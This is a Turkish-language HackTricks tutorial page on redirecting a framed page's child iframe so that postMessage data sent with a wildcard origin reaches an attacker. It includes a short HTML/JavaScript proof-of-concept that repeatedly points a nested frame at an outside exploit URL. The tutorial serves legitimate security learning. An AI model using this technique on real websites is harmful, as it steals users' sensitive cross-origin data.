Steal postmessage modifying iframe location

AWS hackleme becerilerini sıfırdan ileri seviyeye öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ya katılın!

Bir cybersecurity şirketinde çalışıyor musunuz? Şirketinizi HackTricks'te tanıtmak ister misiniz? veya PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? ABONELİK PLANLARINI kontrol edin!
The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonunu.
Resmi PEASS & HackTricks ürünlerini edinin.
💬 Discord grubuna veya telegram grubuna katılın veya Twitter'da 🐦@carlospolopm'u takip edin.
Hacking hilelerinizi hacktricks repo ve hacktricks-cloud repo'ya PR göndererek paylaşın.

Çocuk iframe'lerin konumunu değiştirme

Bu yazıda belirtildiği gibi, başka bir iframe içeren X-Frame-Header olmayan bir web sayfasını iframe'leyebilirseniz, o çocuk iframe'in konumunu değiştirebilirsiniz.

Örneğin, abc.com'un efg.com'u iframe olarak içerdiği ve abc.com'un X-Frame başlığı olmadığı durumda, frames.location kullanarak efg.com'u evil.com'a cross origin olarak değiştirebilirim.

Bu özellikle postMessages'larda kullanışlıdır çünkü bir sayfa, windowRef.postmessage("","*") gibi bir wildcard kullanarak hassas verileri gönderiyorsa, ilgili iframe'in (çocuk veya ebeveyn) konumunu bir saldırganın kontrol ettiği bir konuma değiştirerek ve o verileri çalabilirsiniz.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>

AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

Bir cybersecurity şirketinde mi çalışıyorsunuz? Şirketinizi HackTricks'te reklamını görmek ister misiniz? veya PEASS'ın en son sürümüne veya HackTricks'i PDF olarak indirmek ister misiniz? ABONELİK PLANLARINI kontrol edin!
The PEASS Ailesi'ni, özel NFT'lerimiz koleksiyonumuzu keşfedin.
Resmi PEASS & HackTricks ürünlerini edinin.
💬 Discord grubuna veya telegram grubuna katılın veya Twitter'da beni takip edin 🐦@carlospolopm.
Hacking hilelerinizi hacktricks repo ve hacktricks-cloud repo'ya PR göndererek paylaşın.

PreviousBypassing SOP with Iframes - 2 NextProxy / WAF Protections Bypass

Last updated 2 months ago